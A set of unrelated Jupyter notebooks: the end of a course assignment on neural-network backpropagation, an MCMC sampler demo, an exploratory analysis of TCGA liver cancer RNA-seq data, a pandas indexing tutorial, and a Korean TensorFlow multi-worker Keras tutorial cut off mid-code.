(L-1) -> LINEAR -> SIGMOID group Arguments: AL -- probability vector, output of the forward propagation (L_model_forward()) Y -- true "label" vector (containing 0 if non-cat, 1 if cat) caches -- list of caches containing: every cache of linear_activation_forward() with "relu" (it's caches[l], for l in range(L-1) i.e l = 0...L-2) the cache of linear_activation_forward() with "sigmoid" (it's caches[L-1]) Returns: grads -- A dictionary with the gradients grads["dA" + str(l)] = ... grads["dW" + str(l)] = ... grads["db" + str(l)] = ... """ grads = {} L = len(caches) # the number of layers m = AL.shape[1] Y = Y.reshape(AL.shape) # after this line, Y is the same shape as AL # Initializing the backpropagation ### START CODE HERE ### (1 line of code) dAL = - (np.divide(Y, AL) - np.divide(1 - Y, 1 - AL)) ### END CODE HERE ### # Lth layer (SIGMOID -> LINEAR) gradients. Inputs: "AL, Y, caches". Outputs: "grads["dAL"], grads["dWL"], grads["dbL"] ### START CODE HERE ### (approx. 2 lines) current_cache = caches[-1] grads["dA" + str(L)], grads["dW" + str(L)], grads["db" + str(L)] = linear_activation_backward(dAL, current_cache, "sigmoid") ### END CODE HERE ### for l in reversed(range(L-1)): # lth layer: (RELU -> LINEAR) gradients. # Inputs: "grads["dA" + str(l + 2)], caches". Outputs: "grads["dA" + str(l + 1)] , grads["dW" + str(l + 1)] , grads["db" + str(l + 1)] ### START CODE HERE ### (approx. 5 lines) current_cache = caches[l] dA_prev_temp, dW_temp, db_temp = linear_activation_backward(grads["dA{}".format(l + 2)], current_cache, "relu") grads["dA" + str(l + 1)] = dA_prev_temp grads["dW" + str(l + 1)] = dW_temp grads["db" + str(l + 1)] = db_temp ### END CODE HERE ### return grads AL, Y_assess, caches = L_model_backward_test_case() grads = L_model_backward(AL, Y_assess, caches) print ("dW1 = "+ str(grads["dW1"])) print ("db1 = "+ str(grads["db1"])) print ("dA1 = "+ str(grads["dA1"])) ``` **Expected Output** <table style="width:60%"> <tr> <td > dW1 </td> <td > [[ 0.41010002 0.07807203 0.13798444 0.10502167] [ 0. 0. 0. 0. ] [ 0.05283652 0.01005865 0.01777766 0.0135308 ]] </td> </tr> <tr> <td > db1 </td> <td > [[-0.22007063] [ 0. ] [-0.02835349]] </td> </tr> <tr> <td > dA1 </td> <td > [[ 0.12913162 -0.44014127] [-0.14175655 0.48317296] [ 0.01663708 -0.05670698]] </td> </tr> </table> ### 6.4 - Update Parameters In this section you will update the parameters of the model, using gradient descent: $$ W^{[l]} = W^{[l]} - \alpha \text{ } dW^{[l]} \tag{16}$$ $$ b^{[l]} = b^{[l]} - \alpha \text{ } db^{[l]} \tag{17}$$ where $\alpha$ is the learning rate. After computing the updated parameters, store them in the parameters dictionary. **Exercise**: Implement `update_parameters()` to update your parameters using gradient descent. **Instructions**: Update parameters using gradient descent on every $W^{[l]}$ and $b^{[l]}$ for $l = 1, 2, ..., L$. ``` # GRADED FUNCTION: update_parameters def update_parameters(parameters, grads, learning_rate): """ Update parameters using gradient descent Arguments: parameters -- python dictionary containing your parameters grads -- python dictionary containing your gradients, output of L_model_backward Returns: parameters -- python dictionary containing your updated parameters parameters["W" + str(l)] = ... parameters["b" + str(l)] = ... """ L = len(parameters) // 2 # number of layers in the neural network # Update rule for each parameter. Use a for loop. ### START CODE HERE ### (≈ 3 lines of code) for l in range(L): parameters["W" + str(l + 1)] = parameters["W" + str(l + 1)] - learning_rate * grads["dW" + str(l + 1)] parameters["b" + str(l + 1)] = parameters["b" + str(l + 1)] - learning_rate * grads["db" + str(l + 1)] ### END CODE HERE ### return parameters parameters, grads = update_parameters_test_case() parameters = update_parameters(parameters, grads, 0.1) print ("W1 = "+ str(parameters["W1"])) print ("b1 = "+ str(parameters["b1"])) print ("W2 = "+ str(parameters["W2"])) print ("b2 = "+ str(parameters["b2"])) ``` **Expected Output**: <table style="width:100%"> <tr> <td > W1 </td> <td > [[-0.59562069 -0.09991781 -2.14584584 1.82662008] [-1.76569676 -0.80627147 0.51115557 -1.18258802] [-1.0535704 -0.86128581 0.68284052 2.20374577]] </td> </tr> <tr> <td > b1 </td> <td > [[-0.04659241] [-1.28888275] [ 0.53405496]] </td> </tr> <tr> <td > W2 </td> <td > [[-0.55569196 0.0354055 1.32964895]]</td> </tr> <tr> <td > b2 </td> <td > [[-0.84610769]] </td> </tr> </table> ## 7 - Conclusion Congrats on implementing all the functions required for building a deep neural network! We know it was a long assignment but going forward it will only get better. The next part of the assignment is easier. In the next assignment you will put all these together to build two models: - A two-layer neural network - An L-layer neural network You will in fact use these models to classify cat vs non-cat images!
github_jupyter
``` import numpy as np import matplotlib.pylab as plt import corner import numpy as np import glob from PTMCMCSampler import PTMCMCSampler %matplotlib inline ``` ## Define the likelihood and posterior Functions must read in parameter vector and output log-likelihood or log-prior. Usually easiest to use a class if you need to store some other data or parameters ``` class GaussianLikelihood(object): def __init__(self, ndim=2, pmin=-10, pmax=10): self.a = np.ones(ndim)*pmin self.b = np.ones(ndim)*pmax # get means self.mu = [2]*ndim # ... and a positive definite, non-trivial covariance matrix. cov = 0.5-np.random.rand(ndim**2).reshape((ndim, ndim)) cov = np.triu(cov) cov += cov.T - np.diag(cov.diagonal()) self.cov = np.dot(cov,cov) # Invert the covariance matrix first. self.icov = np.linalg.inv(self.cov) def lnlikefn(self, x): diff = x - self.mu return -np.dot(diff,np.dot(self.icov, diff))/2.0 def lnpriorfn(self, x): if np.all(self.a <= x) and np.all(self.b >= x): return 0.0 else: return -np.inf ``` ## Setup Gaussian model class ``` ndim = 2 pmin, pmax = 0.0, 10.0 glo = GaussianLikelihood(ndim=ndim, pmin=pmin, pmax=pmax) ``` ## Setup sampler Need to initalize the sample at ```p0``` and give an inital jump covariance matrix ```cov```. ``` # Set the start position and the covariance p0 = np.random.uniform(pmin, pmax, ndim) cov = np.eye(ndim) * 0.1**2 sampler = PTMCMCSampler.PTSampler(ndim, glo.lnlikefn, glo.lnpriorfn, np.copy(cov), outDir='./chains') ``` ## Jump Proposals We have the option to choose whatever jump proposals we would like to use in our analysis. Here, we will use the `Uniform` jump proposal (meaning all jumps are equally likely). ``` weights = {"Uniform": 1} initialize_jump_proposal_kwargs = {"Uniform": {"pmin": 0, "pmax": 10}} ``` ## Run Sampler for 200000 steps Different jump proposal weights are given as integers. For example we have used a weight of 20 for all three proposals here. That means that each will be used with a probability of 20/60 = 1/3. ``` data = sampler.sample(p0, 5000, weights=weights, initialize_jump_proposal_kwargs=initialize_jump_proposal_kwargs, burn=500, thin=1, covUpdate=500) ``` ## Finally we can plot the data ``` fig = data.plot_chains() ``` If you want to see what the chains looked like before burnin, you can simply run the following: ``` data.set_burnin(0) fig = data.plot_chains() data.set_burnin(500) fig = data.plot_corner(truths=glo.mu) ``` ## Save the data ``` data.save(outfile="simple.txt") ```
github_jupyter
# Exploratory Data Analysis of Cancer Genomics data using TCGA In this notebook, we will take a look at one of the canonical datasets, if not _the_ dataset, in cancer genomics: TCGA. We'll start with investigating the RNA Sequencing (rnaseq) and Clinical data available for a type of liver cancer known as hepatocellular carcinoma (HCC). Hepatocellular carcinoma is the most common form of liver cancer in the United States, making up [more than 80% of cases](https://www.cancer.gov/about-nci/organization/ccg/research/structural-genomics/tcga/studied-cancers/liver). The TCGA dataset is abbreviated LIHC. Some examples of what researchers have learned from the LIHC dataset at the DNA-level include confirmed [frequent mutations](https://www.cancer.gov/about-nci/organization/ccg/research/structural-genomics/tcga/studied-cancers/liver) in: - The TERT promotor region, associated with regulating cell survival - TP53, one of the most frequently mutated genes in cancer - CTNNB1, a member of the Wnt signaling pathway that mediates cell growth and differentiation There are currently several therapies under development that target these genes. In addition to DNA alterations however, different biological and tumor microenvrionment factors can [influence disease progression](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6237857/). A transcriptomic survey of tissues at various stages of disease progression could help elucidate some of the underlying pathways contributing to tumorigenesis. ### Today, we'll be focusing on using RNA-seq data from LIHC combined with clinical attributes to identify biomarkers for disease progression. The data is stored in the R package _[RTCGA](http://rtcga.github.io/RTCGA/)_ ## Load libraries ``` import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns ``` ## Set variables ``` data_dir="data/" response_name="patient.race" rnaseq_file=data_dir+"lihc_rnaseq.csv.gz" clinical_file=data_dir+"lihc_clinical.csv.gz" ``` ## Load data The data is stored in the RTCGA package in the R programming language. I've outputted it for easy use within python. We will be investigating the Hepatocellular carcinoma dataset. Read about it [here](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5680778/). The TCGA RNASeq data is illumina hiseq Level 3 RSEM normalized expression data. You can read about thec RSEM method [here](https://academic.oup.com/bioinformatics/article/26/4/493/243395). Essentially this is the raw counts of reads that aligned to the gene transcript, though it's only a guess by the program. Since it's a guess, the values are rational numbers. To simplify things, we'll round the values to the next whole integer. ``` rnaseq = (pd. read_csv(rnaseq_file,compression="gzip"). set_index('bcr_patient_barcode'). applymap(lambda x : int(np.ceil(x))) ) display(rnaseq.shape) display(rnaseq.head()) gene_name_logical = [len(x[0])>1 for x in rnaseq.columns.str.split('|')] sub = rnaseq.loc[:,gene_name_logical] sub.columns = [x[0] for x in sub.columns.str.split('|')] rnaseq_sub = sub.copy() rnaseq_sub.head() ``` The clinical data is within the RTCGA package, but is also available [here](https://portal.gdc.cancer.gov/projects/TCGA-LIHC). More cdescription of the clinical attributes are [here](https://gdc.cancer.gov/about-data/data-harmonization-and-generation/clinical-data-harmonization). ``` clinical = pd.read_csv(clinical_file,compression="gzip").set_index('patient.bcr_patient_barcode') display(clinical.shape) display(clinical.head()) ``` ## Gene level distribution In this section, we will investigate the value distribution of genes in our dataset. <br> #### Sample Questions: - What is the range of values for a given gene? - What is the distribution of values for a given gene? - Are there higher than average or lower than average expression of genes? ## Dimension reduction based on gene expression If we were working for a smaller dataset we'd be able to plot the few genes we had on a expression by sample graph. However, we are working with 20k genes and will need a better method than creating 20k separate plots. One way to visualize sample distances is to reduce the dimensional space of gene expression across samples. Using principal component analysis (PCA) we can project the data points into a 2D plane so that each axis or component captures the greatest variation of the sample expression. PCA can be useful to characterize the distances between samples and identify groups of samplings that may be farther or closer apart. We can also identify any samples that might be worth excluding from our analysis. Documentation on sklearn's PCA function can be found [here](https://scikit-learn.org/stable/modules/generated/sklearn.decomposition.PCA.html). ``` from sklearn.decomposition import PCA pca = PCA(n_components=2) ``` ## Differential Expression Analysis We can statistically test for a difference in gene expression by performing a hypothesis test for each gene to see whether there is evidence to decide that expression is signficantly different between conditions. In this section, we will investigate differential expression results derived from the [DESeq2] package in R. Also see this [vignette](https://bioconductor.org/packages/release/bioc/vignettes/DESeq2/inst/doc/DESeq2.html) on how to do these analyses, as well as understand the methods. Briefly, a Sample x Gene matrix of raw count reads and a matching matrix of phenotypes (eg, treatment or condition) for each sample are inputted into DEseq2. In order to account for RNA composition bias and library size, when only a small number of genes are highly expressed in one condition vs another, these genes are normalized by diving the expression by the mean expression for each gene across samples. DEseq2 fits a [negative binomial](https://en.wikipedia.org/wiki/Negative_binomial_distribution) generalized linear model to each gene and uses the [Wald test](https://www.statisticshowto.datasciencecentral.com/wald-test) for significance. Outliers are detected using Cooke's distance and removed from the dataset. Genes with low normalized mean expression values below a threshbold are also removed to improve detection power. https://chipster.csc.fi/manual/deseq2.html #### Sample questions: - Which genes are differentially expressed? Are they positively or negatively expressed compared to your control? - What do these genes do? Which pathways are they involved in? - Are there related clinical phenotypes which might show similar differences in expression? ### Running differential expression analysis via DEseq2 We've created a subprocess to run the R package DEseq2 with our data and return the results in a python-friendly format. To run this script on the command line use: ``` Rscript TCGA_differential_expression_analysis.R "" lihc_rnaseq.csv.gz lihc_clinical.csv.gz 100 patient.gender female male ``` (script name | rna_seq_file.csv.gz | clinical_data_file.csv.gz | num_genes_to_run | clinical_attribute_col | atttribute 1 | attribute 2 Use the output of this file (lihc_DESeq2_100_sampled_genes_patient.gender_female_vs_male.csv) to plot and identify differentially-expressed genes. You can change the clinical columns, attributes and number of genes to explore additional clinical variables. ``` de_gender = pd.read_csv('lihc_DESeq2_100_sampled_genes_patient.gender_female_vs_male.csv') de_gender.head() ``` Create a diagnostic plots to help us visualize the data. An MA-plot shows the log2 fold changes from the treatment over the mean of normalized counts, i.e. the average of counts normalized by size factor. ### Pathway analysis We can do a brief survey of what kinds of pathways and functions some of our differentially expressed genes are involved in. Using the [BioMart](http://www.biomart.org/martservice_9.html) service to annotate our genes with gene ontology (GO) terms. ``` from pybiomart import Server, Dataset dataset = Dataset(name='hsapiens_gene_ensembl', host='http://www.ensembl.org') attributes = [ 'go_id', 'name_1006', 'definition_1006', 'hgnc_symbol', ] bm = dataset.query(attributes=attributes, filters={'chromosome_name': ['1','2']}) bm ``` ## Clinical data type investigation Now that we've gone through the steps of exploratory analysis for a single clinical attribute, you can repeat this process and explore how other clinical factors may change gene expression. In this section, we will investigate the diversity of the clinical data. Explore the clinical attributes available in the dataset. We are interested in understanding whether there are RNA signatures that are change according to disease progression for hepatocellular carcinoma. Are there any relevant attributes in the clinical data which are relevant to identifying this find of biomarker? #### Sample Questions: - How many unique values are there for a given clinical attribute? - How can we define an appropriate response variable for supervised learning? - What clinical attributes can be used to identify biomarkers for disease progression? ## Set up for supervised learning In this section, we will set up a supervised learning paradigm using the Genes within the RNASeq data as predictors and a clinical attribute as a response variable.
github_jupyter
# Ch3.1 Data Indexing and Selection ## Data Selection in Series ### Series as dictionary ``` import pandas as pd data = pd.Series([0.25, 0.5, 0.75, 1.0], index=['a', 'b', 'c', 'd']) data data['b'] ``` We can also use dictionary-like Python expressions and methods to examine the keys/indices and values: ``` 'a' in data data.index data.keys() list(data.items()) ``` extend a ``Series`` by assigning to a new index value: ``` data['e'] = 1.25 data ``` ### Series as one-dimensional array ``` # slicing by explicit index data['a':'c'] # slicing by implicit integer index data[0:2] # masking data[(data > 0.3) & (data < 0.8)] # fancy indexing data[['a', 'e']] ``` ### Indexers: loc, iloc ``` data = pd.Series(['a', 'b', 'c'], index=[1, 3, 5]) data # explicit index when indexing data[1] # implicit index when slicing data[1:3] ``` the ``loc`` attribute allows indexing and slicing that always references the explicit index: ``` data.at[1] data.loc[1] data.loc[1:3] ``` The ``iloc`` attribute allows indexing and slicing that always references the implicit Python-style index: ``` data.iloc[1] data.iloc[1:3] ``` ## Data Selection in DataFrame ### DataFrame as a dictionary ``` area = pd.Series({'California': 423967, 'Texas': 695662, 'New York': 141297, 'Florida': 170312, 'Illinois': 149995}) pop = pd.Series({'California': 38332521, 'Texas': 26448193, 'New York': 19651127, 'Florida': 19552860, 'Illinois': 12882135}) data = pd.DataFrame({'area':area, 'pop':pop}) data data['area'] #dictionary-style indexing data.area #attribute-style access ``` This attribute-style column access actually accesses the exact same object as the dictionary-style access: ``` data.area is data['area'] ``` the ``DataFrame`` has a ``pop()`` method, so ``data.pop`` will point to this rather than the ``"pop"`` column: ``` data.pop is data['pop'] ``` adding a new column: ``` data['density'] = data['pop'] / data['area'] data ``` ### DataFrame as two-dimensional array ``` data.index data.values ``` transpose the full ``DataFrame`` to swap rows and columns: ``` data.T ``` passing a single index to an array accesses a row: ``` data.values[0] ``` passing a single "index" to a ``DataFrame`` accesses a column: ``` data['area'] ``` acess mutiple columns ``` data[['area','pop']] ``` Using the iloc indexer, the ``DataFrame`` index and column labels are maintained in the result: ``` data data.iloc[:3, :2] data.iloc[1,2] data.iloc[0] ``` Using the ``loc`` indexer we can index the underlying data using the explicit index and column names: ``` data.loc['Texas'] data.loc['Illinois', 'pop'] data.loc[:'Illinois', :'pop'] data.loc[:, 'pop':] ``` combine masking and fancy indexing as in the following: ``` data.loc[data.density > 100, ['pop', 'density']] ``` to set or modify values ``` data.iloc[0, 2] = 90 data ``` ### Additional indexing conventions ``` data['Florida':'Illinois'] # slicing rows ``` Such slices can also refer to rows by number rather than by index: ``` data[1:3] ``` Similarly, direct masking operations are also interpreted row-wise rather than column-wise: ``` data[data.density > 100] ``` Access a single value for a row/column pair ``` data.at['Texas','area'] data.iat[4,0] ```
github_jupyter
##### Copyright 2019 The TensorFlow Authors. ``` #@title Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ``` # 케라스를 사용한 다중 워커(Multi-worker) 훈련 <table class="tfo-notebook-buttons" align="left"> <td> <a target="_blank" href="https://www.tensorflow.org/tutorials/distribute/multi_worker_with_keras"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />TensorFlow.org에서 보기</a> </td> <td> <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/ko/tutorials/distribute/multi_worker_with_keras.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />구글 코랩(Colab)에서 실행하기</a> </td> <td> <a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/ko/tutorials/distribute/multi_worker_with_keras.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />깃허브(GitHub) 소스 보기</a> </td> </table> Note: 이 문서는 텐서플로 커뮤니티에서 번역했습니다. 커뮤니티 번역 활동의 특성상 정확한 번역과 최신 내용을 반영하기 위해 노력함에도 불구하고 [공식 영문 문서](https://github.com/tensorflow/docs/blob/master/site/en/tutorials/distribute/multi_worker_with_keras.ipynb)의 내용과 일치하지 않을 수 있습니다. 이 번역에 개선할 부분이 있다면 [tensorflow/docs](https://github.com/tensorflow/docs) 깃허브 저장소로 풀 리퀘스트를 보내주시기 바랍니다. 문서 번역이나 리뷰에 참여하려면 [docs-ko@tensorflow.org](https://groups.google.com/a/tensorflow.org/forum/#!forum/docs-ko)로 메일을 보내주시기 바랍니다. ## 개요 이 튜토리얼에서는 `tf.distribute.Strategy` API를 사용하여 케라스 모델을 다중 워커로 분산 훈련하는 방법을 살펴보겠습니다. 다중 워커를 사용하여 훈련할 수 있도록 전략을 디자인했기 때문에, 단일 워커 훈련용으로 만들어진 케라스 모델도 코드를 조금만 바꾸면 다중 워커를 사용하여 훈련할 수 있습니다. `tf.distribute.Strategy` API에 관심이 있으신 분들은 [텐서플로로 분산 훈련하기](../../guide/distributed_training.ipynb) 가이드에서 텐서플로가 제공하는 분산 훈련 전략들을 훑어보실 수 있습니다. ## 설정 먼저, 텐서플로를 설정하고 필요한 패키지들을 가져옵니다. ``` from __future__ import absolute_import, division, print_function, unicode_literals try: # %tensorflow_version 기능은 코랩에서만 사용할 수 있습니다. %tensorflow_version 2.x except Exception: pass import tensorflow_datasets as tfds import tensorflow as tf tfds.disable_progress_bar() ``` ## 데이터셋 준비하기 MNIST 데이터셋을 [TensorFlow Datasets](https://www.tensorflow.org/datasets)에서 받아옵시다. [MNIST 데이터셋](http://yann.lecun.com/exdb/mnist/)은 0-9 숫자를 손으로 쓴 28x28 픽셀 흑백 이미지입니다. 6만 개의 훈련 샘플과 만 개의 테스트 샘플이 들어있습니다. ``` BUFFER_SIZE = 10000 BATCH_SIZE = 64 # MNIST 데이터를 (0, 255] 범위에서 (0., 1.] 범위로 조정 def scale(image, label): image = tf.cast(image, tf.float32) image /= 255 return image, label datasets, info = tfds.load(name='mnist', with_info=True, as_supervised=True) train_datasets_unbatched = datasets['train'].map(scale).cache().shuffle(BUFFER_SIZE) train_datasets = train_datasets_unbatched.batch(BATCH_SIZE) ``` ## 케라스 모델 만들기 `tf.keras.Sequential` API를 사용하여 간단한 합성곱 신경망 케라스 모델을 만들고 컴파일하도록 하겠습니다. 우리 MNIST 데이터셋으로 훈련시킬 모델입니다. Note: 케라스 모델을 만드는 절차는 [텐서플로 케라스 가이드](https://www.tensorflow.org/guide/keras#sequential_model)에서 더 상세하게 설명하고 있습니다. ``` def build_and_compile_cnn_model(): model = tf.keras.Sequential([ tf.keras.layers.Conv2D(32, 3, activation='relu', input_shape=(28, 28, 1)), tf.keras.layers.MaxPooling2D(), tf.keras.layers.Flatten(), tf.keras.layers.Dense(64, activation='relu'), tf.keras.layers.Dense(10, activation='softmax') ]) model.compile( loss=tf.keras.losses.sparse_categorical_crossentropy, optimizer=tf.keras.optimizers.SGD(learning_rate=0.001), metrics=['accuracy']) return model ``` 먼저 단일 워커를 이용하여 적은 수의 에포크만큼만 훈련을 해보고 잘 동작하는지 확인해봅시다. 에포크가 넘어감에 따라 손실(loss)은 줄어들고 정확도는 1.0에 가까워져야 합니다. ``` single_worker_model = build_and_compile_cnn_model() single_worker_model.fit(x=train_datasets, epochs=3) ``` ## 다중 워커 구성 자 이제 다중 워커 훈련의 세계로 들어가 봅시다. 텐서플로에서 여러 장비를 사용할 때는 `TF_CONFIG` 환경 변수를 설정해야 합니다. 하나의 클러스터를 구성하는 각 장비에 클러스터 구성을 알려주고 각각 다른 역할을 부여하기 위해 `TF_CONFIG`를 사용합니다. `TF_CONFIG`는 `cluster`와 `task` 두 개의 부분으로 구성됩니다. `cluster`에는 훈련 클러스터에 대한 정보를 지정합니다. `worker` 같은 여러 타입의 작업 이름을 키로 하는 파이썬 딕셔너리를 지정합니다. 다중 워커 훈련에서는 보통 일반적인 워커보다 조금 더 많은 일을 하는 특별한 워커가 하나 필요합니다. 이 워커는 체크포인트를 저장하거나, 서머리(summary)를 쓰는 일 등을 추가로 담당하게 됩니다. 보통 치프('chief') 워커라고 부르고, 관례적으로 `index` 번호가 0인 워커가 치프 워커가 됩니다(사실 `tf.distribute.Strategy`가 이렇게 구현되었습니다). 한편 `task`에는 현재 워커의 작업에 대한 정보를 지정합니다. 이 예에서는 작업(task) `type`을 `"worker"`로 지정하고, `index`는 `0`으로 지정하였습니다. 이 말은 이 장비가 첫 번째 워커이고, 따라서 치프 워커이며, 다른 워커보다 더 많은 일을 하게 된다는 뜻입니다. 물론 다른 장비들에도 `TF_CONFIG` 환경변수가 설정되어야 합니다. 다른 장비들에도 `cluster`에는 동일한 딕셔너리를 지정하겠지만, `task`에는 각 장비의 역할에 따라 다른 작업 `type`이나 `index`를 지정해야 합니다. 예시를 위하여, 이 튜토리얼에서는 두 개의 워커를 `localhost`에 띄우는 방법을 보여드리겠습니다. 실제로는 각 워커를 다른 장비에서 띄울텐데, 실제 IP 주소와 포트를 할당하고, 그에 맞게 `TF_CONFIG`를 지정해야 합니다. 주의: 아래 코드를 코랩에서 실행하지 마십시오. 텐서플로 런타임이 주어진 IP와 포트로 gRPC 서버를 띄우려고 할 텐데, 아마도 실패할 것입니다. ``` os.environ['TF_CONFIG'] = json.dumps({ 'cluster': { 'worker': ["localhost:12345", "localhost:23456"] }, 'task': {'type': 'worker', 'index': 0} }) ``` 이 예제에서는 학습률을 바꾸지 않고 그대로 사용한 것에 주의하십시오. 실제로는 전역(global) 배치 크기에 따라 학습률을 조정해야 할 수 있습니다. ## 적절한 전략 고르기 텐서플로의 분산 전략은 크게 각 훈련 단계가 워커들이 가진 복제본들끼리 동기화되는 동기 훈련 방식과, 동기화가 엄격하게 이루어지지 않는 비동기 훈련 방식이 있습니다. 이 튜토리얼에서 다루는 `MultiWorkerMirroredStrategy`는 동기 다중 워커 훈련에서 추천하는 전략입니다. 모델을 훈련하려면 `tf.distribute.experimental.MultiWorkerMirroredStrategy` 인스턴스를 하나 만드십시오. `MultiWorkerMirroredStrategy`는 모델의 레이어에 있는 모든 변수의 복사본을 각 워커의 장치마다 만듭니다. 그리고 수집 작업을 위한 텐서플로 연산인 `CollectiveOps`를 사용하여 그래디언트를 모으고, 각 변수의 값을 동기화합니다. [`tf.distribute.Strategy` 가이드](../../guide/distributed_training.ipynb)에 이 전략에 대한 더 자세한 설명이 있습니다. ``` strategy = tf.distribute.experimental.MultiWorkerMirroredStrategy() ``` Note: `MultiWorkerMirroredStrategy.__init__()`가 호출될 때, `TF_CONFIG`를 파싱하고 텐서플로 gRPC 서버가 구동됩니다. 따라서 `TF_CONFIG` 환경변수는 `tf.distribute.Strategy` 인스턴스를 만들기 전에 설정해야 합니다. `MultiWorkerMirroredStrategy` 는 [`CollectiveCommunication`](https://github.com/tensorflow/tensorflow/blob/a385a286a930601211d78530734368ccb415bee4/tensorflow/python/distribute/cross_device_ops.py#L928) 매개변수로 선택할 수 있는 여러 가지 구현체를 제공합니다. `RING`(링)은 링 구조 기반의 수집 작업 구현체이고, 장비 간 통신을 위하여 gRPC를 사용합니다. `NCCL`은 [Nvidia의 NCCL](https://developer.nvidia.com/nccl)로 수집 작업을 구현한 것입니다. `AUTO`를 지정하면, 런타임이 알아서 선택합니다. 어떤 수집 작업 구현체가 최적인지는 GPU의 종류와 수, 클러스터 내 네트워크 연결 등 여러 요소에 따라 달라집니다. ## MultiWorkerMirroredStrategy로 모델 훈련하기 다중 워커 분산 훈련을 위하여 `tf.distribute.Strategy` API를 `tf.keras`와 함께 사용하려면, 딱 한 가지만 바꾸면 됩니다. 바로 모델 구성과 `model.compile()` 호출 코드를 `strategy.scope()` 안으로 넣는 것입니다. 분산 전략의 범위(scope)를 써서 변수를 어디에 어떻게 만들지 지정할 수 있습니다. `MultiWorkerMirroredStrategy`의 경우, 만들어지는 변수는 `MirroredVariable`이고, 각 워커에 복제본이 생깁니다. Note: 아래 코드가 예상과 같이 동작하는 것처럼 보이겠지만, 사실은 단일 워커로 동작하는 것입니다. `TF_CONFIG`가 설정되어 있지 않기 때문입니다. 실제로 `TF_CONFIG`를 설정하고 아래 예제를 실행하면, 여러 장비를 활용하여 훈련 속도가 빨라지는 것을 볼 수 있습니다. ``` NUM_WORKERS = 2 # 여기서 배치 크기는 워커의 수를 곱한 크기로 늘려야 합니다. `tf.data.Dataset.batch`에는 # 전역 배치 크기를 지정해야 하기 때문입니다. 전에는 64였지만, 이제 128이 됩니다. GLOBAL_BATCH_SIZE = 64 * NUM_WORKERS train_datasets = train_datasets_unbatched.batch(GLOBAL_BATCH_SIZE) with strategy.scope(): multi_worker_model = build_and_compile_cnn_model() multi_worker_model.fit(x=train_datasets, epochs=3) ``` ### 데이터셋 샤딩과 배치 크기 다중 워커 훈련에서는 수렴과 성능을 위하여 데이터를 여러 부분으로 샤딩(sharding)해야 합니다. 하지만, 위 코드 예에서는 데이터셋을 샤딩하지 않고 바로 `model.fit()`으로 보낸 것을 볼 수 있습니다. 이는 `tf.distribute.Strategy` API가 다중 워커 훈련에 맞게 자동으로 데이터셋을 샤딩해주기 때문입니다. 만약 훈련할 때 샤딩을 직접 하고 싶다면, `tf.data.experimental.DistributeOptions` API를 사용해서 자동 샤딩 기능을 끌 수 있습니다. 다음과 같이 말입니다. ``` options = tf.data.Options() options.experimental_distribute.auto_shard = False train_datasets_no_auto_shard = train_datasets.with_options(options) ``` 또 하나 주목할 점은 `datasets`의 배치 크기입니다. 앞서 코드에서 `GLOBAL_BATCH_SIZE = 64 * NUM_WORKERS`로 지정하였습니다. 단일 워커일 때보다 `NUM_WORKERS` 배만큼 크게 지정한 것입니다. 이는 실제로 각 워커에 전달되는 배치 크기가 `tf.data.Dataset.batch()`에 매개변수로 전달된 전역 배치 크기를 워커의 수로 나눈 것이 되기 때문입니다. 즉, 이렇게 바꾸어야 실제로 워커가 처리하는 배치 크기가 단일 워커일 때와 동일한 값이 됩니다. ## 성능 이제 케라스 모델이 완성되었습니다. `MultiWorkerMirroredStrategy`를 사용하여 여러 워커를 사용하여 훈련할 수 있습니다. 다중 워커 훈련의 성능을 더 높이려면 다음 기법들을 확인해 보십시오. * `MultiWorkerMirroredStrategy`는 여러 가지 [수집 작업 통신 구현체](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/distribute/cross_device_ops.py)를 제공합니다. `RING`(링)은 링 구조 기반의 수집 작업 구현체이고, 장비 간 통신을 위하여 gRPC를 사용합니다. `NCCL`은 [Nvidia의 NCCL](https://developer.nvidia.com/nccl)로 수집 작업을 구현한 것입니다. `AUTO`를 지정하면, 런타임이 알아서 선택합니다. 어떤 수집 작업 구현체가 최적인지는 GPU의 종류와 수, 클러스터 내 네트워크 연결 등 여러 요소에 따라 달라집니다. 런타임이 알아서 선택한 것을 바꾸려면, `MultiWorkerMirroredStrategy` 생성자의 `communication` 매개변수에 적절한 값을 지정하십시오. 예를 들면 `communication=tf.distribute.experimental.CollectiveCommunication.NCCL`과 같이 지정합니다. * 가능하면 변수를 `tf.float` 타입으로 바꾸십시오. 공식 ResNet 모델을 보면 어떻게 바꾸는지 [예제](https://github.com/tensorflow/models/blob/8367cf6dabe11adf7628541706b660821f397dce/official/resnet/resnet_model.py#L466)가 있습니다. ## 내결함성 동기 훈련 방식에서는, 워커 중 하나가 죽으면 전체 클러스터가 죽어버리고, 복구 메커니즘이 따로 없습니다. 하지만 케라스와 `tf.distribute.Strategy`를 함께 사용하면, 워커가 죽거나 불안정해지는 경우에도 내결함성을 제공합니다. 이는 사용자가 선택한 분산 파일 시스템에 훈련 상태를 저장하는 기능을 제공하기 때문입니다. 기존 인스턴스가 죽거나 정지당해서 재시작되는 경우에도 훈련 상태를 복구할 수 있습니다. 모든 워커가 훈련 에포크 혹은 스텝에 따라 동기화되므로, 다른 워커들은 죽거나 정지당한 워커가 복구될 때까지 기다려야 합니다. ### ModelCheckpoint 콜백 다중 워커 훈련의 내결함 기능을 사용하려면, `tf.keras.Model.fit()`를 호출할 때 `tf.keras.callbacks.ModelCheckpoint`의 인스턴스를 제공해야 합니다. 이 콜백이 체크포인트와 훈련 상태를 `ModelCheckpoint`의 `filepath` 매개변수에 지정한 디렉터리에 저장합니다. ``` # `filepath` 매개변수를 모든 워커가 접근할 수 있는 파일 시스템 경로로 바꾸십시오. callbacks = [tf.keras.callbacks.ModelCheckpoint(filepath='/tmp/keras-ckpt')] with strategy.scope(): multi_worker_model = build_and_compile_cnn_model() multi_worker_model.fit(x=train_datasets, 